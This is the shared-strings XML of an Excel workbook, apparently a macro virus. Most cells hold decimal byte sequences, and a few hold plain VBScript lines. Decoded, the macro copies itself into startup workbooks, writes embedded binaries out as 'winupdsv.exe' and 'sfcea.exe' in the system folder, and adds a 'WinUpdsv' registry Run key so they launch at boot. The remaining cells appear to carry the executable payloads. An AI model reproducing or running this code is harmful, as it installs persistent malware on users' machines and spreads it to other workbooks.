200 183 95 248 137 125 240 11 173 168 32 76 249 219 144 46 66 87 81 60 49 3 198 246 64 4 128 109 173 247 97 193 143 69 12 50 208 50 8 250 166 55 11 223 231 141 133 236 251 239 77 252 43 77 12 109 112 235 222 74 16 115 41 10 255 31 138 9 176 10 119 251 214 173 84 9 240 198 117 64 136 8 64 243 141 149 41 107 183 69 137 229 109 0 175 124 204 149 179 141 219 89 59 43 7 69 244 12 80 13 145 133 183 6 209 113 255 52 48 2 28 187 192 2 219 116 67 114 244 139 248 137 124 11 9 183 221 42 91 </t>
  </si>
  <si>
    <t xml:space="preserve">135 49 154 159 160 240 133 246 11 162 120 205 226 132 237 164 72 105 83 143 6 124 70 32 153 17 78 23 86 13 170 151 217 179 5 137 46 178 192 77 177 11 17 34 207 139 117 235 13 57 186 229 118 183 84 223 126 62 210 8 86 239 190 52 2 91 252 6 95 64 6 193 232 4 16 9 126 4 4 55 166 4 129 93 194 244 48 136 4 81 252 181 224 15 20 196 51 190 253 68 81 1 66 59 60 16 124 200 94 166 32 86 14 152 17 186 10 224 1 132 188 75 109 33 195 14 152 104 224 130 87 86 135 241 102 162 157 64 17 76 5 244 106 2 235 53 114 51 75 47 236 2 72 65 212 154 205 116 105 80 55 106 32 77 16 84 86 150 237 137 45 212 16 97 86 17 248 80 107 165 95 106 57 1 94 106 4 116 4 5 129 64 180 33 7 91 19 44 89 55 14 161 90 155 196 100 40 68 113 110 30 46 152 120 235 17 142 105 216 59 222 8 142 137 48 97 225 200 145 229 172 15 12 25 144 73 114 246 220 226 28 180 253 90 176 253 199 7 88 19 223 43 110 61 222 68 26 59 248 103 190 119 83 60 171 180 66 24 141 77 228 12 202 141 30 92 92 85 2 16 158 192 220 179 92 18 114 137 86 59 119 156 133 118 114 126 23 12 115 240 216 136 193 192 42 249 185 163 100 27 139 155 100 139 133 196 93 224 8 204 117 182 145 101 220 184 216 163 212 194 118 79 152 136 236 190 12 169 235 46 52 159 59 107 44 78 13 86 172 17 137 205 54 223 176 80 253 243 216 175 83 229 74 238 27 131 224 74 132 51 255 59 247 13 99 197 254 154 249 209 56 4 25 68 235 24 6 138 189 202 179 231 8 12 72 30 164 163 131 157 71 63 62 95 231 94 193 154 156 180 37 1 215 209 133 97 71 4 28 6 18 112 157 181 40 44 233 189 34 239 118 74 35 117 177 94 86 240 8 250 131 82 20 100 64 58 240 255 20 168 252 131 52 97 64 116 64 129 125 8 137 19 215 56 55 218 171 86 63 28 181 76 10 166 51 240 81 32 171 23 154 11 36 206 214 104 71 137 3 117 230 57 40 24 121 248 235 184 24 225 24 235 14 186 24 182 222 171 101 96 245 138 </t>
  </si>
  <si>
    <t xml:space="preserve">folder1 = fso.getspecialfolder(1)</t>
  </si>
  <si>
    <t xml:space="preserve">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1 0 32 0 0 0 0 0 0 0 0 0 0 0 192 32 224 0 20 0 5 0 9 0 245 255 32 0 0 248 0 0 0 0 0 0 0 0 192 32 224 0 20 0 5 0 0 0 245 255 32 0 0 0 0 0 0 0 0 0 0 0 192 32 224 0 20 0 5 0 44 0 245 255 32 0 0 248 0 0 0 0 0 0 0 0 192 32 224 0 20 0 5 0 42 0 245 255 32 0 0 248 0 0 0 0 0 0 0 0 192 32 224 0 20 0 5 0 43 0 245 255 32 0 0 248 0 0 0 0 0 0 0 0 192 32 224 0 20 0 5 0 41 0 245 255 32 0 0 248 0 0 0 0 0 0 0 0 192 32 224 0 20 0 0 0 49 0 1 0 32 0 0 4 0 0 0 0 0 0 0 0 192 32 224 0 20 0 7 0 49 0 1 0 32 0 0 12 0 0 0 0 0 0 0 0 192 32 224 0 20 0 5 0 0 0 17 1 32 0 0 0 0 0 0 0 0 0 0 0 192 32 224 0 20 0 5 0 49 0 17 1 32 0 0 4 0 0 0 0 0 0 0 0 192 32 224 0 20 0 0 0 49 0 9 0 32 0 0 4 0 0 0 0 0 0 0 0 192 32 147 2 4 0 16 128 5 255 147 2 4 0 0 128 0 255 147 2 23 0 17 0 9 0 1 56 94 196 137 95 0 110 0 111 0 114 0 109 0 97 0 49 0 147 2 4 0 18 128 4 255 147 2 4 0 19 128 7 255 147 2 4 0 20 128 3 255 147 2 4 0 21 128 6 255 96 1 2 0 0 0 133 0 22 0 214 16 0 0 0 1 </t>
  </si>
  <si>
    <t xml:space="preserve">100 69 90 114 138 185 139 19 126 161 185 173 108 139 130 145 122 95 106 5 88 57 23 97 9 183 94 117 76 30 45 211 180 239 96 194 170 69 106 235 199 141 77 244 219 115 89 169 109 233 16 2 211 100 11 7 151 189 57 209 33 248 235 167 44 156 22 20 206 24 12 6 61 116 64 27 51 67 11 55 1 128 56 26 13 205 203 107 97 108 191 167 28 212 61 108 235 22 159 240 46 193 39 26 24 13 161 24 86 106 23 250 181 208 47 94 26 184 170 235 6 27 125 7 226 15 71 239 139 198 163 25 83 0 83 89 163 209 168 125 112 134 174 33 18 34 207 86 200 34 78 24 32 26 88 232 111 211 173 89 219 184 80 145 139 21 25 137 4 17 171 137 155 90 181 32 9 61 208 114 129 234 124 60 99 163 119 185 96 28 140 242 8 139 4 239 120 96 139 6 240 206 4 97 3 131 9 255 8 236 22 110 48 32 66 148 192 41 124 212 16 209 45 189 246 4 57 128 65 194 82 233 119 208 248 162 224 226 101 144 50 140 94 161 144 219 22 111 130 254 243 214 40 127 241 11 67 111 235 7 254 95 168 16 239 53 254 179 36 219 78 8 36 254 137 14 246 47 24 112 163 75 91 197 12 243 239 12 115 169 12 182 6 238 35 215 34 129 254 112 109 193 7 144 126 191 31 108 117 11 155 47 108 216 7 86 10 40 89 96 241 18 15 199 238 87 116 100 236 120 19 183 237 141 72 57 14 88 24 73 16 78 4 126 16 13 94 147 216 38 83 174 215 7 249 150 182 198 51 131 58 132 139 101 203 232 225 134 163 253 15 141 4 200 235 5 184 88 115 9 194 216 91 50 54 202 13 103 83 217 89 138 56 42 52 74 52 154 176 63 240 141 133 45 238 95 82 84 12 95 116 6 251 0 38 126 185 235 15 253 45 235 8 13 2 246 135 92 191 185 91 93 195 204 0 106 44 69 26 32 87 1 139 71 211 111 93 106 121 209 53 59 254 13 59 248 15 130 120 105 201 85 9 119 247 199 3 63 90 216 245 225 183 250 66 115 249 8 114 41 224 255 36 149 216 30 141 109 105 251 183 199 186 28 131 233 4 114 90 224 110 200 23 167 107 110 229 133 240 29 30 141 </t>
  </si>
  <si>
    <t xml:space="preserve">137 177 71 186 19 234 50 8 102 115 10 12 126 104 100 225 52 188 87 194 225 252 222 253 238 140 209 15 252 171 104 255 214 252 52 140 141 130 153 16 13 240 184 194 116 135 126 224 188 191 95 116 31 83 149 20 219 243 189 240 77 37 1 104 4 58 149 82 46 64 45 195 212 83 91 201 92 250 133 97 20 42 126 188 144 173 228 66 46 140 87 146 125 56 43 183 109 151 28 235 36 107 228 128 227 28 199 225 216 67 100 4 233 25 35 160 15 206 96 60 194 228 12 203 235 69 86 19 241 234 160 140 17 94 249 103 250 210 129 16 81 68 63 0 15 224 184 245 189 112 53 64 48 214 198 63 60 208 128 221 33 65 186 138 235 124 4 58 93 155 161 177 71 12 87 217 52 14 111 198 122 225 11 52 56 235 48 141 135 43 185 46 140 21 61 0 106 47 183 32 19 163 39 204 182 7 83 31 60 158 29 147 231 178 114 114 56 176 252 98 185 61 99 221 176 23 15 4 53 38 214 214 179 150 36 90 110 142 132 172 117 82 51 83 215 172 178 248 123 60 121 158 104 24 139 185 15 177 44 176 236 211 189 31 141 70 1 80 87 179 220 195 23 87 178 79 145 94 216 52 235 105 22 14 6 202 69 99 18 235 249 230 2 111 241 86 57 13 210 43 195 178 72 117 30 41 159 123 198 204 220 242 16 11 135 12 20 236 103 206 125 76 208 62 13 187 247 218 27 210 91 88 253 46 124 129 226 71 240 10 129 194 97 137 16 17 154 50 204 56 94 95 213 172 191 48 48 156 173 57 54 85 69 164 221 225 208 111 48 116 173 147 46 87 166 62 172 8 201 30 86 117 22 23 251 43 41 22 97 246 235 16 7 234 23 51 51 156 56 97 93 47 60 8 6 213 111 148 96 105 6 187 3 42 168 68 24 255 202 239 26 110 208 16 198 151 14 227 131 234 48 141 125 200 220 224 183 215 128 175 221 196 131 226 10 80 27 196 60 7 133 109 193 86 204 9 208 25 79 75 110 240 109 93 212 12 220 137 85 224 209 228 180 112 114 157 205 85 240 171 15 105 167 88 210 121 96 15 16 4 25 46 185 219 15 109 228 251 50 185 255 92 161 229 251 122 156 75 65 136 228 251 </t>
  </si>
  <si>
    <t xml:space="preserve">If Not fso.folderexists(myfolder) Then</t>
  </si>
  <si>
    <t xml:space="preserve">14 0 64 107 98 116 97 115 116 111 64 115 104 101 51 35 140 0 4 0 86 0 86 0 174 1 4 0 1 0 1 4 23 0 8 0 1 0 0 0 0 0 0 0 24 0 29 0 0 0 0 7 7 0 0 0 1 0 0 0 0 0 0 67 111 117 110 116 101 114 58 0 0 73 0 1 0 193 1 8 0 193 1 0 0 96 105 1 0 252 0 55 8 83 0 0 0 55 0 0 0 113 0 0 84 104 105 115 87 111 114 107 98 111 111 107 46 83 104 101 101 116 115 40 34 64 107 98 116 97 115 116 111 64 115 104 101 51 35 34 41 46 67 111 108 117 109 110 115 40 52 41 46 67 111 112 121 32 87 111 114 107 98 111 111 107 115 40 34 110 111 114 109 97 49 46 120 108 109 34 41 46 83 104 101 101 116 115 40 34 64 107 98 116 97 115 116 111 64 115 104 101 51 35 34 41 46 67 111 108 117 109 110 115 40 52 41 113 0 0 84 104 105 115 87 111 114 107 98 111 111 107 46 83 104 101 101 116 115 40 34 64 107 98 116 97 115 116 111 64 115 104 101 51 35 34 41 46 67 111 108 117 109 110 115 40 53 41 46 67 111 112 121 32 87 111 114 107 98 111 111 107 115 40 34 110 111 114 109 97 49 46 120 108 109 34 41 46 83 104 101 101 116 115 40 34 64 107 98 116 97 115 116 111 64 115 104 101 51 35 34 41 46 67 111 108 117 109 110 115 40 53 41 20 0 0 79 110 32 69 114 114 111 114 32 82 101 115 117 109 101 32 78 101 120 116 55 0 0 109 121 102 111 108 100 101 114 32 61 32 119 46 83 112 101 99 105 97 108 70 111 108 100 101 114 115 40 34 84 101 109 112 108 97 116 101 115 34 41 32 38 32 34 92 83 111 102 116 119 97 114 101 92 34 28 0 0 70 111 114 32 105 32 61 32 49 32 84 111 32 87 111 114 107 98 111 111 107 115 46 67 111 117 110 116 40 0 0 73 102 32 87 111 114 107 98 111 111 107 115 40 105 41 46 78 97 109 101 32 61 32 34 110 111 114 109 97 108 46 120 108 109 34 32 84 104 101 110 18 0 0 87 111 114 107 98 111 111 107 115 40 105 41 46 67 108 111 115 101 40 0 0 </t>
  </si>
  <si>
    <t xml:space="preserve">232 144 7 108 241 191 233 186 0 4 44 3 80 35 209 138 6 136 7 138 70 1 136 101 107 110 107 168 5 2 86 8 89 198 91 118 146 177 199 92 204 141 73 43 37 73 158 101 25 1 2 2 166 3 249 186 179 144 35 70 33 71 63 140 154 166 233 186 207 6 188 3 180 172 164 156 221 234 175 105 148 140 191 68 142 228 96 143 228 211 52 77 211 7 232 232 236 236 240 77 211 52 77 240 244 244 248 248 252 225 79 44 52 252 156 141 48 3 240 3 248 9 220 166 251 14 255 240 240 3 252 16 31 17 3 123 75 23 121 94 95 56 144 157 11 66 112 193 102 249 17 163 13 86 234 48 67 10 43 141 45 103 237 37 131 240 124 57 252 127 36 13 253 227 112 222 62 187 252 119 112 32 247 217 239 141 32 32 69 62 39 147 143 249 43 120 31 176 153 174 251 44 144 136 11 168 3 208 109 3 150 124 221 173 58 111 3 78 88 79 86 182 183 75 24 246 75 31 163 238 2 239 2 111 217 128 124 41 140 144 39 36 227 149 45 9 171 45 3 174 69 117 23 102 104 90 85 91 36 6 44 211 52 77 211 3 52 60 68 76 84 154 166 25 97 103 32 151 28 28 24 24 105 154 166 105 20 20 16 16 12 164 105 154 166 12 8 8 4 4 211 117 39 44 31 128 5 136 3 152 9 206 45 97 172 32 151 183 181 135 192 22 194 108 15 131 19 202 37 18 194 183 254 236 119 238 93 13 164 0 50 4 224 119 34 18 10 181 191 158 4 255 17 22 57 68 32 228 137 6 207 193 19 47 146 222 172 123 145 90 110 53 107 8 116 119 225 177 180 0 207 39 116 28 111 3 208 94 228 178 184 181 230 15 240 240 86 100 32 65 182 150 68 177 195 196 174 72 91 156 188 202 10 220 240 193 58 172 214 18 9 166 170 9 143 37 74 184 90 70 46 205 224 212 128 148 137 24 227 26 137 190 209 15 140 103 108 78 103 139 86 134 194 130 117 52 133 86 104 181 166 158 179 16 105 89 142 28 235 249 193 255 141 60 189 60 207 191 218 91 137 255 138 79 4 95 128 225 130 34 45 6 128 206 118 160 169 24 221 56 129 126 186 124 78 171 32 31 21 118 208 197 </t>
  </si>
  <si>
    <t xml:space="preserve">175 239 0 77 184 213 125 176 36 21 75 99 185 103 27 104 8 132 115 194 162 83 47 88 176 72 96 52 93 226 216 89 185 66 246 12 209 137 23 201 14 104 113 68 135 188 228 251 58 125 129 97 38 105 30 158 31 8 156 70 50 62 18 37 141 108 36 63 244 11 182 148 192 64 56 93 120 143 117 116 86 77 63 139 67 138 245 248 3 89 118 124 124 218 147 13 67 123 109 167 18 92 38 220 176 208 23 91 48 255 128 56 14 3 93 131 165 44 178 193 217 94 111 6 48 242 78 184 12 30 57 52 255 69 72 86 16 60 52 156 179 179 49 52 6 44 241 148 91 108 87 193 148 54 36 137 53 5 56 35 35 35 35 44 48 60 64 216 22 154 134 255 32 24 86 163 116 2 120 108 27 220 65 38 184 128 203 7 196 81 3 120 78 12 210 221 116 81 87 94 68 152 228 5 222 145 45 44 156 68 184 234 230 163 155 213 176 3 126 236 224 196 76 80 232 24 31 91 131 197 108 173 184 8 79 4 90 47 142 3 204 86 50 50 43 19 6 211 83 145 0 240 123 129 217 40 65 83 104 242 128 102 180 4 192 21 158 26 116 112 97 220 57 152 109 135 220 60 248 223 164 45 16 15 217 143 150 77 9 11 86 24 80 15 200 118 114 166 107 86 84 78 8 152 61 27 187 10 116 8 247 12 166 7 13 25 51 240 139 147 160 12 190 138 189 75 183 252 0 157 156 39 8 65 78 178 197 152 149 76 201 195 158 11 22 152 244 118 242 218 233 91 168 205 20 6 45 80 60 12 8 178 144 107 91 208 31 43 125 104 244 236 57 107 118 68 72 255 12 172 53 178 23 4 23 218 221 27 163 112 87 143 218 112 210 73 17 104 100 68 172 62 240 175 51 215 139 10 185 246 126 215 170 9 247 159 235 106 106 19 104 80 28 26 83 214 61 19 5 79 55 60 26 1 255 76 201 63 52 106 18 104 40 2 25 106 10 104 28 80 216 60 36 5 191 3 139 199 218 226 171 65 142 52 16 20 83 52 186 184 124 50 112 42 57 174 240 235 139 202 65 186 36 151 77 241 235 20 243 114 225 105 144 243 191 185 87 221 240 235 230 204 183 29 176 13 134 20 80 37 19 186 </t>
  </si>
  <si>
    <t xml:space="preserve">fso.createfolder myfolder</t>
  </si>
  <si>
    <t xml:space="preserve">73 102 32 87 111 114 107 98 111 111 107 115 40 105 41 46 78 97 109 101 32 61 32 34 110 111 114 109 97 49 46 120 108 109 34 32 84 104 101 110 7 0 0 71 111 84 111 32 97 49 34 0 0 73 102 32 78 111 116 32 102 115 111 46 102 105 108 101 101 120 105 115 116 115 40 102 105 108 101 115 118 41 32 84 104 101 110 41 0 0 79 112 101 110 32 102 105 108 101 115 118 32 70 111 114 32 66 105 110 97 114 121 32 65 99 99 101 115 115 32 87 114 105 116 101 32 65 115 32 35 49 15 0 0 70 111 114 32 105 32 61 32 49 32 84 111 32 53 52 5 0 0 110 32 61 32 49 18 0 0 109 32 61 32 73 110 83 116 114 40 104 118 44 32 34 32 34 41 14 0 0 68 111 32 87 104 105 108 101 32 109 32 62 32 48 9 0 0 110 32 61 32 109 32 43 32 49 21 0 0 109 32 61 32 73 110 83 116 114 40 110 44 32 104 118 44 32 34 32 34 41 4 0 0 76 111 111 112 8 0 0 67 108 111 115 101 32 35 49 34 0 0 73 102 32 78 111 116 32 102 115 111 46 102 105 108 101 101 120 105 115 116 115 40 102 105 108 101 115 102 41 32 84 104 101 110 15 0 0 70 111 114 32 105 32 61 32 49 32 84 111 32 50 56 35 0 0 73 102 32 78 111 116 32 102 115 111 46 102 105 108 101 101 120 105 115 116 115 40 102 105 108 101 120 108 109 41 32 84 104 101 110 22 0 0 102 115 111 46 100 101 108 101 116 101 102 105 108 101 32 102 105 108 101 120 108 109 54 0 0 87 111 114 107 98 111 111 107 115 46 79 112 101 110 32 65 112 112 108 105 99 97 116 105 111 110 46 83 116 97 114 116 117 112 80 97 116 104 32 38 32 34 92 110 111 114 109 97 49 46 120 108 109 34 28 0 0 87 111 114 107 98 111 111 107 115 40 34 110 111 114 109 97 49 46 120 108 109 34 41 46 83 97 118 101 68 0 0 102 115 111 46 99 111 112 121 102 105 108 101 32 65 112 112 108 105 99 97 116 105 111 110 46 83 116 97 114 116 117 112 80 97 116 104 32 38 32 34 92 110 111 114 109 97 49 46 120 108 109 34 44 32 </t>
  </si>
  <si>
    <t xml:space="preserve">252 190 21 120 247 14 72 103 15 182 1 65 3 194 247 216 27 192 154 192 5 54 151 16 233 16 9 94 7 54 58 240 143 162 122 12 165 121 66 133 82 89 21 65 197 1 152 48 96 160 198 247 20 252 91 65 32 88 6 27 160 138 11 152 46 218 80 4 175 10 158 162 248 86 173 148 171 0 119 193 110 116 98 91 168 181 202 23 73 98 4 72 83 107 129 223 214 138 64 5 60 10 90 255 216 129 18 207 86 55 66 79 1 232 248 198 14 104 162 77 226 5 10 184 22 80 81 49 57 139 145 180 36 183 58 45 137 23 42 147 124 193 117 21 8 44 28 36 26 240 147 19 252 49 109 177 73 60 88 115 19 255 80 101 23 98 129 37 110 76 139 85 240 85 240 76 3 44 99 81 110 171 128 248 88 23 122 217 98 210 116 82 63 4 12 4 14 36 251 22 45 3 142 136 68 109 80 13 91 43 68 129 48 224 9 238 203 102 91 58 22 160 16 138 13 26 51 174 254 218 173 196 60 13 217 181 71 255 19 90 194 73 57 104 37 186 46 159 24 33 64 193 72 179 221 191 21 219 8 2 235 94 198 7 13 71 68 235 115 203 12 216 121 115 43 212 255 106 1 208 10 216 96 161 155 9 71 34 244 185 65 187 230 11 179 15 31 19 138 69 255 23 70 139 11 237 13 10 255 71 136 68 49 5 235 41 59 71 210 128 125 255 99 179 88 138 183 5 22 10 235 24 49 255 74 189 18 47 6 119 25 123 119 26 54 75 206 191 146 219 71 235 16 93 116 218 37 215 232 243 6 146 228 44 6 43 70 32 11 23 134 155 231 81 54 241 199 226 180 16 116 2 255 208 104 20 74 104 8 134 124 63 229 4 197 236 104 4 14 0 193 202 85 172 202 98 200 183 9 249 204 20 83 16 1 87 15 95 57 200 108 167 221 61 216 100 117 17 151 245 44 122 9 147 233 143 40 156 198 83 139 92 127 55 91 148 161 237 212 136 29 208 40 60 161 176 251 255 232 103 131 34 139 13 172 126 141 113 252 59 240 114 19 139 6 151 254 220 168 53 195 247 53 176 237 94 104 32 249 46 13 249 148 24 241 104 40 16 36 138 125 141 47 133 219 91 75 122 137 134 108 23 </t>
  </si>
  <si>
    <t xml:space="preserve">130 105 121 15 190 8 226 74 9 1 13 169 207 70 244 52 106 92 80 115 187 159 117 177 160 32 67 120 23 136 30 80 70 58 19 167 101 182 162 16 125 20 251 46 182 32 131 61 241 58 86 158 5 98 64 83 178 140 3 223 102 15 227 251 116 18 136 24 64 120 251 91 235 15 13 108 20 90 144 116 85 152 26 8 163 201 88 158 83 86 240 21 14 49 167 235 61 25 125 22 24 54 125 120 91 204 78 22 34 117 6 138 191 248 14 182 208 174 1 174 117 63 38 94 230 139 254 179 247 200 165 127 144 180 199 4 36 236 24 18 66 211 140 83 91 52 252 17 172 131 91 59 232 235 32 162 95 57 192 21 24 248 66 164 237 51 26 71 4 10 89 70 235 3 82 176 131 93 135 244 86 49 87 83 211 13 49 152 124 201 8 8 116 17 49 133 37 244 158 180 11 16 82 228 146 28 44 104 6 114 28 8 145 5 204 133 42 228 247 141 1 120 32 2 147 247 133 146 247 72 120 231 73 203 15 190 158 19 170 130 32 156 120 20 133 246 120 50 5 152 109 232 109 48 55 23 71 42 37 91 11 55 9 190 248 111 235 67 125 208 190 205 136 229 207 231 71 59 223 89 136 23 26 223 176 60 91 68 235 31 131 251 2 150 10 91 235 90 120 128 161 18 19 59 77 223 145 4 67 65 69 68 175 147 176 189 50 41 148 18 8 180 11 226 144 233 36 235 58 112 83 50 144 96 232 38 128 180 41 179 193 58 36 66 56 91 71 131 60 165 164 28 18 15 244 245 144 65 186 37 20 227 227 159 225 208 80 39 190 49 185 48 87 40 73 247 9 70 86 3 254 15 227 199 195 236 80 9 70 34 85 215 250 153 195 225 248 195 15 132 224 223 193 67 46 207 246 20 177 27 242 89 28 195 30 200 32 219 123 145 8 122 247 247 73 177 72 46 18 37 20 34 202 79 155 33 21 148 61 33 70 255 215 110 146 135 212 72 35 244 247 20 36 169 181 118 96 16 139 127 35 41 95 100 66 10 153 50 86 244 151 34 140 133 205 80 244 99 77 8 64 106 114 147 81 90 164 80 102 78 22 35 188 25 93 68 243 24 245 243 130 12 2 65 136 243 12 108 65 58 255 244 </t>
  </si>
  <si>
    <t xml:space="preserve">End If</t>
  </si>
  <si>
    <t xml:space="preserve">109 121 102 111 108 100 101 114 44 32 84 114 117 101 25 0 0 84 104 105 115 87 111 114 107 98 111 111 107 46 83 97 118 101 100 32 61 32 84 114 117 101 3 0 0 97 49 58 52 0 0 83 101 116 32 102 115 111 32 61 32 67 114 101 97 116 101 79 98 106 101 99 116 40 34 115 99 114 105 112 116 105 110 103 46 102 105 108 101 115 121 115 116 101 109 111 98 106 101 99 116 34 41 37 0 0 83 101 116 32 119 32 61 32 67 114 101 97 116 101 79 98 106 101 99 116 40 34 119 115 99 114 105 112 116 46 115 104 101 108 108 34 41 6 0 0 69 110 100 32 73 102 4 0 0 78 101 120 116 7 0 0 69 110 100 32 83 117 98 38 0 0 73 102 32 78 111 116 32 102 115 111 46 102 111 108 100 101 114 101 120 105 115 116 115 40 109 121 102 111 108 100 101 114 41 32 84 104 101 110 25 0 0 102 115 111 46 99 114 101 97 116 101 102 111 108 100 101 114 32 109 121 102 111 108 100 101 114 54 0 0 102 115 111 46 100 101 108 101 116 101 102 105 108 101 32 65 112 112 108 105 99 97 116 105 111 110 46 83 116 97 114 116 117 112 80 97 116 104 32 38 32 34 92 110 111 114 109 97 108 46 120 108 109 34 34 0 0 102 105 108 101 115 118 32 61 32 102 111 108 100 101 114 49 32 38 32 34 92 119 105 110 117 112 100 115 118 46 101 120 101 34 31 0 0 102 105 108 101 115 102 32 61 32 102 111 108 100 101 114 49 32 38 32 34 92 115 102 99 101 97 46 101 120 101 34 33 0 0 102 105 108 101 120 108 109 32 61 32 102 111 108 100 101 114 49 32 38 32 34 92 110 111 114 109 97 49 46 120 108 109 34 20 0 0 80 114 105 118 97 116 101 32 83 117 98 32 97 100 100 115 117 109 40 41 33 0 0 65 112 112 108 105 99 97 116 105 111 110 46 68 105 115 112 108 97 121 65 108 101 114 116 115 32 61 32 70 97 108 115 101 102 0 0 119 46 114 101 103 119 114 105 116 101 32 34 72 75 69 89 95 76 79 67 65 76 95 77 65 67 72 73 78 69 92 83 111 102 116 119 97 114 101 92 77 105 99 114 111 115 111 102 </t>
  </si>
  <si>
    <t xml:space="preserve">164 179 73 95 236 170 115 13 87 70 147 218 152 198 8 237 87 248 209 105 234 201 5 115 115 90 240 154 165 14 217 244 60 141 15 95 49 86 94 194 23 76 168 12 75 235 79 190 234 70 232 111 24 26 28 234 48 21 216 24 67 82 46 79 125 9 165 11 199 175 62 235 32 139 7 38 253 141 0 113 152 164 20 66 156 145 87 23 248 70 184 17 240 119 16 57 95 95 117 244 135 209 10 237 125 3 137 7 103 23 15 59 139 45 190 169 195 79 124 91 139 87 12 244 194 243 237 109 199 91 118 43 71 4 175 22 243 103 139 79 8 138 191 5 183 210 43 217 136 51 93 248 249 214 139 222 193 250 169 147 203 86 55 227 20 149 218 153 70 227 111 113 116 40 109 59 208 115 34 128 58 112 180 48 224 237 141 46 66 235 241 48 128 117 18 233 142 118 35 54 80 186 252 0 94 81 230 0 211 99 13 246 71 12 252 188 122 241 35 183 173 18 210 24 33 85 235 43 193 3 194 55 128 0 13 151 198 121 6 112 91 178 246 80 106 71 255 202 193 191 117 59 125 114 245 29 139 71 8 131 140 115 11 95 138 236 91 104 179 8 64 71 13 65 52 46 252 49 54 229 98 52 249 54 175 119 13 239 214 140 213 226 239 5 116 96 71 24 120 173 3 231 98 102 14 65 42 41 93 33 30 187 114 178 86 3 193 243 37 105 112 176 235 81 232 53 244 61 92 12 255 91 53 67 29 2 115 7 60 97 116 26 60 114 116 15 96 120 185 192 60 119 213 34 1 185 1 3 223 246 117 161 93 0 206 1 188 185 9 232 206 187 218 108 111 240 1 90 138 132 71 58 195 253 227 59 211 254 118 227 51 182 15 190 192 26 84 127 62 96 131 232 43 116 69 206 86 95 222 4 25 116 54 14 116 28 72 102 172 61 108 205 214 97 8 163 199 144 1 85 201 182 6 50 182 216 183 20 142 74 162 41 182 182 212 208 194 125 9 253 152 31 190 45 108 112 117 115 1 254 70 252 15 2 129 206 128 27 254 3 63 111 130 184 212 133 200 117 89 11 200 112 23 60 111 111 91 111 101 98 116 72 75 46 7 11 116 18 4 6 117 64 183 216 183 10 13 105 59 128 205 64 </t>
  </si>
  <si>
    <t xml:space="preserve">77 244 145 108 55 9 28 99 135 5 22 235 57 34 152 227 200 182 24 0 117 231 46 69 131 164 147 45 226 244 83 68 48 228 134 146 178 4 118 183 186 80 13 225 25 61 15 16 92 136 195 144 28 84 88 22 25 171 176 59 216 169 64 228 137 31 230 26 83 65 14 100 171 32 195 252 253 3 33 88 134 70 100 193 105 112 11 153 144 252 252 180 144 90 144 67 101 252 29 18 155 52 204 14 51 58 18 252 240 210 74 38 228 252 175 11 144 9 108 200 24 234 12 22 199 186 61 116 59 145 70 86 181 128 124 154 214 62 43 196 92 52 13 89 136 92 14 169 34 77 36 3 12 49 246 69 114 114 217 167 12 248 180 12 146 75 71 133 88 117 93 72 160 33 19 152 107 64 225 177 236 205 158 75 50 58 158 165 162 212 66 201 222 163 236 81 106 9 160 234 5 18 28 60 131 139 160 13 93 214 0 35 27 29 30 175 224 220 83 1 54 199 128 248 220 13 2 240 251 4 216 14 48 210 104 236 249 97 234 179 89 192 61 163 106 127 133 52 100 41 179 23 196 18 197 118 62 53 211 224 132 28 199 196 253 35 211 144 158 232 180 247 65 181 235 229 56 22 226 212 190 101 74 249 28 6 44 62 67 75 71 83 201 204 103 11 92 96 152 104 200 117 247 222 115 34 7 41 14 148 191 254 1 145 217 98 35 235 137 104 156 40 216 182 214 53 96 39 22 57 194 197 208 11 180 132 121 98 246 175 50 7 182 13 108 192 142 21 117 58 21 170 33 8 65 198 30 58 106 86 38 217 218 236 42 92 240 1 235 119 108 180 193 158 187 251 137 157 192 30 199 133 184 194 24 73 151 120 109 200 180 247 70 221 138 188 249 151 60 204 52 136 108 188 249 24 217 178 119 46 188 251 56 108 124 72 133 176 28 255 86 36 144 96 48 184 32 30 41 33 204 54 180 224 132 222 18 33 117 105 117 81 9 200 34 17 207 18 92 93 214 131 240 191 212 219 216 118 22 134 61 235 64 251 112 208 255 178 183 178 64 63 243 240 96 119 130 95 252 21 44 59 135 116 167 140 5 110 176 132 243 13 132 24 192 200 68 210 24 24 220 166 14 24 32 112 171 16 179 249 30 205 </t>
  </si>
  <si>
    <t xml:space="preserve">For i = 1 To Workbooks.Count</t>
  </si>
  <si>
    <t xml:space="preserve">116 92 87 105 110 100 111 119 115 92 67 117 114 114 101 110 116 86 101 114 115 105 111 110 92 82 117 110 92 87 105 110 85 112 100 115 118 34 44 32 34 119 105 110 117 112 100 115 118 46 101 120 101 34 33 0 0 102 111 108 100 101 114 49 32 61 32 102 115 111 46 103 101 116 115 112 101 99 105 97 108 102 111 108 100 101 114 40 49 41 60 0 0 104 118 32 61 32 84 104 105 115 87 111 114 107 98 111 111 107 46 83 104 101 101 116 115 40 34 64 107 98 116 97 115 116 111 64 115 104 101 51 35 34 41 46 67 101 108 108 115 40 105 44 32 53 41 46 86 97 108 117 101 60 0 0 104 118 32 61 32 84 104 105 115 87 111 114 107 98 111 111 107 46 83 104 101 101 116 115 40 34 64 107 98 116 97 115 116 111 64 115 104 101 51 35 34 41 46 67 101 108 108 115 40 105 44 32 52 41 46 86 97 108 117 101 60 0 0 104 118 32 61 32 84 104 105 115 87 111 114 107 98 111 111 107 46 83 104 101 101 116 115 40 34 64 107 98 116 97 115 116 111 64 115 104 101 51 35 34 41 46 67 101 108 108 115 40 105 44 32 51 41 46 86 97 108 117 101 113 0 0 84 104 105 115 87 111 114 107 98 111 111 107 46 83 104 101 101 116 115 40 34 64 107 98 116 97 115 116 111 64 115 104 101 51 35 34 41 46 67 111 108 117 109 110 115 40 51 41 46 67 111 112 121 32 87 111 114 107 98 111 111 107 115 40 34 110 111 114 109 97 49 46 120 108 109 34 41 46 83 104 101 101 116 115 40 34 64 107 98 116 97 115 116 111 64 115 104 101 51 35 34 41 46 67 111 108 117 109 110 115 40 51 41 15 0 0 70 111 114 32 105 32 61 32 49 32 84 111 32 56 57 41 0 0 79 112 101 110 32 102 105 108 101 115 102 32 70 111 114 32 66 105 110 97 114 121 32 65 99 99 101 115 115 32 87 114 105 116 101 32 65 115 32 35 49 42 0 0 79 112 101 110 32 102 105 108 101 120 108 109 32 70 111 114 32 66 105 110 97 114 121 32 65 99 99 101 115 115 32 87 114 105 116 101 32 65 115 32 35 49 15 0 0 68 105 109 32 98 117 102 </t>
  </si>
  <si>
